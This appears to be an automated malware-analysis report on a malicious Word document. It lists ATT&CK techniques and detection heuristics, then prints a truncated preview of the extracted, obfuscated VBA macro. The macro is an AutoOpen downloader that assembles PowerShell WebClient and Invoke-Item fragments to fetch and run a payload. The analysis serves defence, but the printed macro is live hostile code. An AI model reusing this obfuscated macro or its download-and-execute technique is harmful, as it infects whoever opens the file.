MALICIOUS (Risk Score 242)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function, indicating an attempt to execute arbitrary code. The macro constructs a URL by concatenating several strings, which is then likely used to download and execute a second-stage payload. The presence of the Shell() call and the obfuscated URL strongly suggest malicious intent.
Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6394109-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52102 bytes |

SHA-256: fcb42abea95ce30fd1a221064053489f5d9b476911846de2043f376f9938eadf
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dlhMUdiIYLiQWm"
Function ZqiiJhczs()
iXnLPLzVdl = Array(UCase("qAvGuqNq" + "MMIaSFbUKfTZbw" + "lvAckinzWKB" + "GpqQWkjfrickEf" + "nTziPEUVwq"))
szQrRziQz = Mid("2kJi11PNT9DO+HLOver.HLO+HLOcom/HRM2z/,HiiPCtfiucVEIE3cGmj", 12, 28)
PTUlczIdnPf = Array(UCase("uoajstzh" + "zJwsKBdQw" + "DADoicwDmrYl" + "pSswCvlGjabrEr" + "CJGtwwT"))
ZocRU = Array(UCase("FQZPmPQJUiTP" + "ouQjCSPYFEziXc" + "rlTsamiPGbwN" + "uKuTDCtUnl" + "faMzMZlPn"))
TrDjSLt = Array(UCase("jJOplfbcQ" + "fFAUaoMdzc" + "VpmVraBojmV" + "PrZdYGEOBNm" + "ZijcEzQFinNUcT"))
ZmHYRmnsX = Mid("UJoFKt0LutIjljac4Io3chHLO+HLO{HLO+HLOwrite-HLO+HLOhost vqHLO+HLOL_.HLO+HLOExceptxW'+'9+x'+'W9HLO+HLOiHLO+HLOon.MeHLO+HLOsHLO+HLOsage;}HLO+HLO}HLO).repLACExW9+xIHTHFsGp", 21, 139)
TqPBz = Array(UCase("RjLbpLKiJHG" + "vdvJjaU" + "SEzBMzaiDhqh" + "qdbjrOrjpd" + "LaiiECsKuEL"))
qzrQXXpc = Array(UCase("EZnjmKakcALnXv" + "YHCswJqZk" + "WQwciFAEMzoO" + "AjwwHbsJtJU" + "GRkXkOACB"))
rplaHSMaDDI = Array(UCase("cnnCtZIu" + "iKmwATT" + "UZRJzttiJvY" + "HCGkBAvBRzjXo" + "ACGGbvJwFE"))
oXLVFAHun = Mid("fLZIzS);Invoke-IHLO+HLOtHLO+HLOem(vqLHLO+HLOhuHLO+HLOasxW9+xW9);HLO+HLObrHLO+HLO'+'eak;}caHLO+HLOtwA8vz0m", 7, 92)
dKizp = Array(UCase("uiHwvKiKw" + "KdCIzLjzrYc" + "bNYnQhcl" + "LcjpUqJfibjNt" + "cOcZZiC"))
QriONidKQb = Array(UCase("BiuuUkijGtfE" + "zAXRLXq" + "VXsqbCUdfKzBzz" + "BGzMFohjVz" + "JbYrlhO"))
LUFAZHshfj = Array(UCase("mIRQudN" + "IIfpXjuiwV" + "uDICsJWcBUrj" + "dhUoWiHjkfXOs" + "OLUwMAGXziGYG"))
MLHzf = Mid("kfRW9(HLOvqLHLO,[StRiNGkhIKaBVD9JwbrY6SzIiSjzUl2", 4, 20)
iNmqII = Array(UCase("fGCDshJGaihDC" + "dWLNKlFnrWsWts" + "nZQmIUP" + "CEfviHzouBMwCf" + "XdlsOfLVoR"))
bQWPIK = Array(UCase("AMCRZoLpMG" + "TNwJXkoA" + "IQhXiikGjp" + "zXkiXcFoEbYz" + "ktmINatRY"))
lmLKbCjpt = Array(UCase("StzLCvYQ" + "dQnnjRijwwvqi" + "FRCYJWAihoz" + "ihDPhSOdib" + "GsvRvIsMS"))
QwuCJNIjR = Mid("jfzG.WeHLO+HLObHLO+HLOClHLO+HLOiHLO+HLOeHLO+HLOntHLO+HLO;vqLHLO+HLOnsaHLO+HLOdHLO+H7QPQnoYMFCIGsBjpwrisV5k4G2FsVdBizEM", 5, 79)
MHZYFDI = Array(UCase("OkffmqDFFXYO" + "dQlviAwujRTnlw" + "sJvQZmVzszT" + "AWTbpWzIsbiORc" + "fSMsBubNwbHpI"))
iCSaXsPX = Array(UCase("NstzWPtpvjwnJ" + "zdjPdbBzdDwf" + "FFZochmUo" + "PKDVnnrP" + "jMTRZdjrm"))
GGKblVCTGj = Array(UCase("KzFYKkYFcCauBC" + "VkiQXIjBIlXZJt" + "uRlBbqvmhFbAw" + "lZAiHvLPv" + "pawzmmLOMmIJI"))
czucNdwZ = Mid("LPC33tzqwvLOtHLO+'+'HLOrantHLO+HLOhudHLO+HZasJNfT", 11, 32)
jHXJz = Array(UCase("OqDqBokWv" + "GXOJUUFZGN" + "mndwAlnA" + "sqAFZTMT" + "hDRvtML"))
LMtHmqAj = Array(UCase("aGawwLv" + "mkWMXuCz" + "iVwLAtzzvtN" + "KIcQzDAUMTjth" + "LaZPRLOGdnMoa"))
RpEYG = Array(UCase("qjvYwEsMMN" + "EtVrSCwpznBr" + "PNouARJlqzaiQ" + "mdkfNvwkYjRs" + "jQbhpoHJ"))
JwKLkVin = Mid("a4wsszRDjqjoqz8Wid5OU8Jw379),[StRing][cHaR]39)'+'.rEPlACe'+'(([cHaR]113+[cHaR]80+[cHaR]50),[StRing][cHaR]92).rEPlACe(([cHaR]70+[c'+'HaR]98+[cHaR]105),xW9N14irl6MJWPbIujzF", 26, 131)
lsiGZQQKYRo = Array(UCase("cwASiUcc" + "wXqCdSLmCiNiXa" + "bBZDfpDKdor" + "SRLMLjhdr" + "JkoRBJKMiFY"))
jdzTm = Array(UCase("PwMvEANwuNBP" + "MMInwpip" + "cHGdVOQk" + "JdDNlSSrwWclE" + "uUDOYCsRitHWE"))
IiEjUCrNI = Array(UCase("lwncSNwoaaA" + "ztKbrnYkRuqRD" + "OMJBIRciURaAwF" + "HBGwVQJdGp" + "BlOqHVZ"))
lPpOzUHKvz = Mid("tfW5GK8h((' (xW9 (HLOvHLO+HLOqHLO+HLOxW9+xW9LfHLO+HLOrancHLO+HLO = HLO+HLOnew-objeHLO+HLOct HLO+HLOSHLO+HLOysteHLO+HL'+'O'+'m.NetHLO+HLOV8VV4HVn3tbo4", 9, 128)
cXvnbjdHw = Array(UCase("afzjJXsmHzaqV" + "rINWXQM" + "SAriwrzK" + "POdQSXw" + "hwINDoihoaW"))
CnhlkMFumwc = Array(UCase("wmiZSjKSZt" + "roTMJtk" + "iiEjCLHPr" + "iJFbcGmcb" + "PLzkjFwMiYEzX"))
mGRBS = Array(UCase("aDfzRmzr" + "wsjczqjDU" + "dliAmjuK" + "mAJEPZmfVO" + "ItDaARBY"))
lMOKnqaNMEU = Mid("WJKoXs8Ebb][cHAR]36).repLACE(HLOSL8HLO,xW9+xW9[StRiNG][cHAR]39).repLACE(([cHAR]79+[cHAR]49+[cHAR]'+'105),'+'HL
```

... (truncated)